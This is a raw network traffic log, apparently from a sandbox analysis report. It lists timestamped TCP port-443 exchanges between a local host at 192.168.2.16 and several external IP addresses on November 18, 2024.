                                                                                                                                          Nov 18, 2024 06:48:20.881683111 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:20.881691933 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:20.881719112 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:20.881745100 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:20.891058922 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:20.891107082 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:20.891176939 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:20.891185999 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:20.891207933 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:20.891225100 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:20.895692110 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:20.895740986 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:20.895788908 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:20.895795107 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:20.895828962 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:20.895843029 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:20.992238998 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:20.992290020 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:20.992337942 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:20.992347956 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:20.992388964 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:20.992402077 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:21.067898035 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:21.067948103 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:21.067991972 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:21.068006992 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:21.068039894 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:21.068057060 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:21.169099092 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:21.169150114 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:21.169198990 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:21.169212103 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:21.169250965 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:21.169262886 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:21.226670980 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:21.226721048 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:21.226820946 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:21.226830006 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:21.226871967 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:21.226872921 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:21.342853069 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:21.342926025 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:21.342999935 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:21.343008995 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:21.343044043 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:21.343064070 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:21.459142923 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:21.459212065 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:21.459254026 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:21.459264040 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:21.459333897 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:21.460167885 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:21.519256115 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:21.519306898 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:21.519377947 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:21.519385099 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:21.519398928 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:21.519429922 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:21.576916933 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:21.576968908 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:21.577038050 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:21.577045918 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:21.577088118 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:21.692958117 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:21.693017006 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:21.693103075 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:21.693110943 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:21.693155050 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:21.693167925 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:21.768718004 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:21.768767118 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:21.768805027 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:21.768814087 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:21.768850088 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:21.768861055 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:21.958090067 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:21.958158970 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:21.958208084 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:21.958216906 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:21.958251953 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:21.958262920 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:22.034914970 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:22.034974098 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:22.035016060 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:22.035033941 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:22.035060883 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:22.035084009 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:22.043973923 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:22.043997049 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:22.044063091 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:22.044070005 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:22.044097900 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:22.044127941 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:22.161156893 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:22.161210060 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:22.161259890 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:22.161269903 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:22.161303043 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:22.161324024 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:22.277309895 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:22.277350903 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:22.277409077 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:22.277420998 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:22.277457952 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:22.277472019 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:22.339206934 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:22.339247942 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:22.339302063 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:22.339308977 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:22.339349985 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:22.339366913 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:22.536545038 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:22.536628962 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:22.536665916 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:22.536685944 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:22.536712885 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:22.536726952 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:22.556262970 CET55207443192.168.2.16142.250.186.132
                                                                                                                                          Nov 18, 2024 06:48:22.556305885 CET44355207142.250.186.132192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:22.556380987 CET55207443192.168.2.16142.250.186.132
                                                                                                                                          Nov 18, 2024 06:48:22.556587934 CET55207443192.168.2.16142.250.186.132
                                                                                                                                          Nov 18, 2024 06:48:22.556597948 CET44355207142.250.186.132192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:22.573893070 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:22.573951960 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:22.574004889 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:22.574023008 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:22.574063063 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:22.574084997 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:22.839301109 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:22.839366913 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:22.839402914 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:22.839431047 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:22.839451075 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:22.839471102 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:22.839503050 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:22.839526892 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:22.885952950 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:22.886013985 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:22.886090994 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:22.886100054 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:22.886262894 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:23.161489964 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:23.161513090 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:23.161562920 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:23.161616087 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:23.161632061 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:23.161669970 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:23.161693096 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:23.320153952 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:23.320226908 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:23.320306063 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:23.320342064 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:23.320362091 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:23.320403099 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:23.409048080 CET44355207142.250.186.132192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:23.409420967 CET55207443192.168.2.16142.250.186.132
                                                                                                                                          Nov 18, 2024 06:48:23.409439087 CET44355207142.250.186.132192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:23.409908056 CET44355207142.250.186.132192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:23.410216093 CET55207443192.168.2.16142.250.186.132
                                                                                                                                          Nov 18, 2024 06:48:23.410291910 CET44355207142.250.186.132192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:23.462194920 CET55207443192.168.2.16142.250.186.132
                                                                                                                                          Nov 18, 2024 06:48:23.553940058 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:23.553972960 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:23.554020882 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:23.554388046 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:23.554424047 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:23.554497004 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:23.787080050 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:23.787091970 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:23.787137985 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:23.787278891 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:23.787331104 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:23.787431955 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:23.937217951 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:23.937293053 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:23.937350988 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:23.937390089 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:23.937517881 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:23.937517881 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:24.297391891 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:24.297406912 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:24.297435999 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:24.297519922 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:24.297554970 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:24.297580957 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:24.297610998 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:24.301054001 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:24.301069975 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:24.301167965 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:24.301178932 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:24.301230907 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:24.454899073 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:24.454921007 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:24.455023050 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:24.455049038 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:24.455104113 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:24.573019028 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:24.573041916 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:24.573108912 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:24.573153019 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:24.573194027 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:24.573501110 CET55201443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:24.573518991 CET4435520135.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:24.576948881 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:24.576993942 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:24.577075958 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:24.577399969 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:24.577429056 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:24.650408030 CET55209443192.168.2.1618.66.102.12
                                                                                                                                          Nov 18, 2024 06:48:24.650428057 CET4435520918.66.102.12192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:24.650511980 CET55209443192.168.2.1618.66.102.12
                                                                                                                                          Nov 18, 2024 06:48:24.650758982 CET55209443192.168.2.1618.66.102.12
                                                                                                                                          Nov 18, 2024 06:48:24.650775909 CET4435520918.66.102.12192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.412780046 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.413119078 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:25.413136005 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.413502932 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.413827896 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:25.413913965 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.413938046 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:25.455332041 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.457192898 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:25.505335093 CET4435520918.66.102.12192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.505866051 CET55209443192.168.2.1618.66.102.12
                                                                                                                                          Nov 18, 2024 06:48:25.505876064 CET4435520918.66.102.12192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.506944895 CET4435520918.66.102.12192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.507009029 CET55209443192.168.2.1618.66.102.12
                                                                                                                                          Nov 18, 2024 06:48:25.508033991 CET55209443192.168.2.1618.66.102.12
                                                                                                                                          Nov 18, 2024 06:48:25.508110046 CET4435520918.66.102.12192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.508194923 CET55209443192.168.2.1618.66.102.12
                                                                                                                                          Nov 18, 2024 06:48:25.508203030 CET4435520918.66.102.12192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.553165913 CET55209443192.168.2.1618.66.102.12
                                                                                                                                          Nov 18, 2024 06:48:25.713383913 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.713414907 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.713423014 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.713464975 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.713493109 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:25.713501930 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.713521004 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.713538885 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:25.713548899 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:25.713566065 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:25.714736938 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.714759111 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.714802980 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:25.714816093 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.714828968 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:25.714860916 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:25.828865051 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.828891039 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.828982115 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:25.828999043 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.829047918 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:25.829922915 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.829938889 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.830003023 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:25.830012083 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.830061913 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:25.831585884 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.831608057 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.831660986 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:25.831669092 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.831722975 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:25.832772017 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.832794905 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.832837105 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:25.832845926 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.832880020 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:25.832891941 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:25.944612026 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.944638968 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.944739103 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:25.944761992 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.944820881 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:25.945622921 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.945641041 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.945703983 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:25.945713997 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.945760965 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:25.946223021 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.946240902 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.946301937 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:25.946311951 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.946360111 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:25.947385073 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.947401047 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.947444916 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:25.947453976 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.947480917 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:25.947498083 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:25.948430061 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.948446035 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.948518038 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:25.948527098 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.948570013 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:25.949246883 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.949261904 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.949316025 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:25.949325085 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:25.949367046 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.061747074 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.061765909 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.061878920 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.061913967 CET4435520852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:26.061959982 CET55208443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:26.062987089 CET4435520852.223.1.163192.168.2.16
